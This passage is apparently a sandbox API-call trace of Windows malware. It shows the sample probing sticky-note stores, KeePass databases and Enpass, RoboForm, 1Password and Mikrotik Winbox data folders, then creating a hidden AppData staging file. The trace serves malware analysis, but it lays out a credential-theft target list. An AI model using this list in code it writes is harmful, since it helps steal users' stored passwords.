hHeap=0x840000) returned 1 [0185.447] GetProcessHeap () returned 0x840000 [0185.447] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873b90 [0185.448] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.449] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873b90 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0185.449] GetProcessHeap () returned 0x840000 [0185.449] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x87a228 [0185.450] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.451] wvsprintfW (in: param_1=0x87a228, param_2="%s\\stickies\\rtf", arglist=0x19f7b4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 50 [0185.451] GetProcessHeap () returned 0x840000 [0185.451] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x68) returned 0x871d98 [0185.451] GetProcessHeap () returned 0x840000 [0185.451] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.452] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 0 [0185.453] GetProcessHeap () returned 0x840000 [0185.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873b90 | out: hHeap=0x840000) returned 1 [0185.453] GetProcessHeap () returned 0x840000 [0185.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.453] GetProcessHeap () returned 0x840000 [0185.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.453] GetProcessHeap () returned 0x840000 [0185.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8721f0 | out: hHeap=0x840000) returned 1 [0185.453] GetProcessHeap () returned 0x840000 [0185.453] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x12c) returned 0x873a58 [0185.453] GetProcessHeap () returned 0x840000 [0185.453] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x871f80 [0185.453] GetProcessHeap () returned 0x840000 [0185.453] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873b90 [0185.454] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.455] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873b90 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0185.455] GetProcessHeap () returned 0x840000 [0185.455] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f60) returned 0x87a228 [0185.485] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.486] wvsprintfW (in: param_1=0x87a228, param_2="%s\\NoteFly\\notes", arglist=0x19f7fc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 51 [0185.486] GetProcessHeap () returned 0x840000 [0185.486] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6a) returned 0x871d98 [0185.486] GetProcessHeap () returned 0x840000 [0185.486] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.487] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 0 [0185.488] GetProcessHeap () returned 0x840000 [0185.488] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873b90 | out: hHeap=0x840000) returned 1 [0185.488] GetProcessHeap () returned 0x840000 [0185.488] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.488] GetProcessHeap () returned 0x840000 [0185.488] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.488] GetProcessHeap () returned 0x840000 [0185.488] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871f80 | out: hHeap=0x840000) returned 1 [0185.488] GetProcessHeap () returned 0x840000 [0185.488] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f86) returned 0x87a228 [0185.489] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.489] wvsprintfW (in: param_1=0x87a228, param_2="%s\\Conceptworld\\Notezilla\\Notes8.db", arglist=0x19f7f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 70 [0185.489] GetProcessHeap () returned 0x840000 [0185.489] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x90) returned 0x874638 [0185.489] GetProcessHeap () returned 0x840000 [0185.490] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.490] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 0 [0185.491] GetProcessHeap () returned 0x840000 [0185.491] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874638 | out: hHeap=0x840000) returned 1 [0185.491] GetProcessHeap () returned 0x840000 [0185.491] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f92) returned 0x87a228 [0185.491] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.492] wvsprintfW (in: param_1=0x87a228, param_2="%s\\Microsoft\\Sticky Notes\\StickyNotes.snt", arglist=0x19f7e4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 76 [0185.492] GetProcessHeap () returned 0x840000 [0185.492] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9c) returned 0x862f38 [0185.492] GetProcessHeap () returned 0x840000 [0185.492] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.493] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 0 [0185.493] GetProcessHeap () returned 0x840000 [0185.493] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x862f38 | out: hHeap=0x840000) returned 1 [0185.493] GetProcessHeap () returned 0x840000 [0185.493] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.494] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.495] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.495] GetProcessHeap () returned 0x840000 [0185.495] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f44) returned 0x87a228 [0185.495] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.496] wvsprintfW (in: param_1=0x87a228, param_2="%s", arglist=0x19f808 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0185.496] GetProcessHeap () returned 0x840000 [0185.496] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x42) returned 0x86d658 [0185.496] GetProcessHeap () returned 0x840000 [0185.496] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.497] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0185.497] GetProcessHeap () returned 0x840000 [0185.497] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.498] Sleep (dwMilliseconds=0xa) [0185.515] GetProcessHeap () returned 0x840000 [0185.516] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.516] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.517] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f588 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx") returned 38 [0185.517] GetProcessHeap () returned 0x840000 [0185.517] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x50) returned 0x861f58 [0185.517] GetProcessHeap () returned 0x840000 [0185.517] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.518] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx", lpFindFileData=0x19f59c | out: lpFindFileData=0x19f59c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="환\x86㩘\x87")) returned 0xffffffff [0185.518] GetProcessHeap () returned 0x840000 [0185.518] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861f58 | out: hHeap=0x840000) returned 1 [0185.518] GetProcessHeap () returned 0x840000 [0185.518] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86d658 | out: hHeap=0x840000) returned 1 [0185.518] GetProcessHeap () returned 0x840000 [0185.518] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.520] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.520] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0185.521] GetProcessHeap () returned 0x840000 [0185.521] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f44) returned 0x87a228 [0185.521] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.522] wvsprintfW (in: param_1=0x87a228, param_2="%s", arglist=0x19f7f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0185.522] GetProcessHeap () returned 0x840000 [0185.522] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x866260 [0185.522] GetProcessHeap () returned 0x840000 [0185.522] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.523] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0185.523] GetProcessHeap () returned 0x840000 [0185.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.524] Sleep (dwMilliseconds=0xa) [0185.559] GetProcessHeap () returned 0x840000 [0185.559] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.559] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.560] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f570 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx") returned 36 [0185.560] GetProcessHeap () returned 0x840000 [0185.560] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4c) returned 0x861e50 [0185.561] GetProcessHeap () returned 0x840000 [0185.561] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.561] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx", lpFindFileData=0x19f584 | out: lpFindFileData=0x19f584*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="扠\x86㩘\x87")) returned 0xffffffff [0185.561] GetProcessHeap () returned 0x840000 [0185.561] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861e50 | out: hHeap=0x840000) returned 1 [0185.561] GetProcessHeap () returned 0x840000 [0185.561] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x866260 | out: hHeap=0x840000) returned 1 [0185.562] GetProcessHeap () returned 0x840000 [0185.562] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.562] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.563] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.563] GetProcessHeap () returned 0x840000 [0185.563] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f44) returned 0x87a228 [0185.564] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.565] wvsprintfW (in: param_1=0x87a228, param_2="%s", arglist=0x19f7d8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0185.565] GetProcessHeap () returned 0x840000 [0185.565] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x42) returned 0x86d568 [0185.565] GetProcessHeap () returned 0x840000 [0185.565] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.566] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0185.566] GetProcessHeap () returned 0x840000 [0185.566] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.567] Sleep (dwMilliseconds=0xa) [0185.616] GetProcessHeap () returned 0x840000 [0185.616] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.617] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.618] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f558 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb") returned 37 [0185.618] GetProcessHeap () returned 0x840000 [0185.618] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4e) returned 0x862270 [0185.618] GetProcessHeap () returned 0x840000 [0185.618] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.619] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb", lpFindFileData=0x19f56c | out: lpFindFileData=0x19f56c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="함\x86㩘\x87")) returned 0xffffffff [0185.619] GetProcessHeap () returned 0x840000 [0185.619] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x862270 | out: hHeap=0x840000) returned 1 [0185.619] GetProcessHeap () returned 0x840000 [0185.619] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86d568 | out: hHeap=0x840000) returned 1 [0185.619] GetProcessHeap () returned 0x840000 [0185.620] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.620] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.668] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0185.668] GetProcessHeap () returned 0x840000 [0185.668] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f44) returned 0x87a228 [0185.669] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.670] wvsprintfW (in: param_1=0x87a228, param_2="%s", arglist=0x19f808 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0185.670] GetProcessHeap () returned 0x840000 [0185.670] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x865d98 [0185.670] GetProcessHeap () returned 0x840000 [0185.670] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.672] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0185.672] GetProcessHeap () returned 0x840000 [0185.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.673] Sleep (dwMilliseconds=0xa) [0185.713] GetProcessHeap () returned 0x840000 [0185.714] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.714] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.715] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f588 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb") returned 35 [0185.715] GetProcessHeap () returned 0x840000 [0185.715] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4a) returned 0x861e50 [0185.715] GetProcessHeap () returned 0x840000 [0185.715] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.715] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb", lpFindFileData=0x19f59c | out: lpFindFileData=0x19f59c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="嶘\x86㩘\x87")) returned 0xffffffff [0185.716] GetProcessHeap () returned 0x840000 [0185.716] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861e50 | out: hHeap=0x840000) returned 1 [0185.716] GetProcessHeap () returned 0x840000 [0185.716] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x865d98 | out: hHeap=0x840000) returned 1 [0185.716] GetProcessHeap () returned 0x840000 [0185.716] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.717] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.718] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.718] GetProcessHeap () returned 0x840000 [0185.718] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f52) returned 0x87a228 [0185.719] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.719] wvsprintfW (in: param_1=0x87a228, param_2="%s\\Enpass", arglist=0x19f818 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 38 [0185.719] GetProcessHeap () returned 0x840000 [0185.720] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x50) returned 0x861da0 [0185.720] GetProcessHeap () returned 0x840000 [0185.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.721] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 0 [0185.721] GetProcessHeap () returned 0x840000 [0185.721] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.721] GetProcessHeap () returned 0x840000 [0185.721] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861da0 | out: hHeap=0x840000) returned 1 [0185.721] GetProcessHeap () returned 0x840000 [0185.722] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.722] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.723] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.723] GetProcessHeap () returned 0x840000 [0185.723] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f66) returned 0x87a228 [0185.724] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.725] wvsprintfW (in: param_1=0x87a228, param_2="%s\\My RoboForm Data", arglist=0x19f810 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 48 [0185.725] GetProcessHeap () returned 0x840000 [0185.725] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x64) returned 0x871d98 [0185.725] GetProcessHeap () returned 0x840000 [0185.725] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.727] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 0 [0185.727] GetProcessHeap () returned 0x840000 [0185.727] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.727] GetProcessHeap () returned 0x840000 [0185.727] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.727] GetProcessHeap () returned 0x840000 [0185.727] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.728] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.729] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.729] GetProcessHeap () returned 0x840000 [0185.729] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f58) returned 0x87a228 [0185.729] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.730] wvsprintfW (in: param_1=0x87a228, param_2="%s\\1Password", arglist=0x19f81c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 41 [0185.730] GetProcessHeap () returned 0x840000 [0185.730] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x56) returned 0x871d98 [0185.730] GetProcessHeap () returned 0x840000 [0185.730] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.732] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 0 [0185.732] GetProcessHeap () returned 0x840000 [0185.732] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.732] GetProcessHeap () returned 0x840000 [0185.732] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.732] GetProcessHeap () returned 0x840000 [0185.732] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.733] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.734] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0185.734] GetProcessHeap () returned 0x840000 [0185.734] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x87a228 [0185.736] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.737] wvsprintfW (in: param_1=0x87a228, param_2="Mikrotik\\Winbox", arglist=0x19f804 | out: param_1="Mikrotik\\Winbox") returned 15 [0185.737] GetProcessHeap () returned 0x840000 [0185.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x22) returned 0x8708a8 [0185.737] GetProcessHeap () returned 0x840000 [0185.737] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.738] PathFileExistsW (pszPath="Mikrotik\\Winbox") returned 0 [0185.739] GetProcessHeap () returned 0x840000 [0185.739] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.739] GetProcessHeap () returned 0x840000 [0185.739] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0185.812] GetProcessHeap () returned 0x840000 [0185.813] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.813] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.814] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0185.814] GetProcessHeap () returned 0x840000 [0185.814] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.815] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.816] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f63c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0185.816] GetProcessHeap () returned 0x840000 [0185.816] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x871d98 [0185.816] GetProcessHeap () returned 0x840000 [0185.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.817] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0xffffffff [0185.872] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9"), lpSecurityAttributes=0x0) returned 1 [0185.874] GetProcessHeap () returned 0x840000 [0185.874] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f50) returned 0x87a228 [0185.875] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.876] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s.%s", arglist=0x19f650 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0185.876] GetProcessHeap () returned 0x840000 [0185.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x861098 [0185.877] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.877] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.878] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 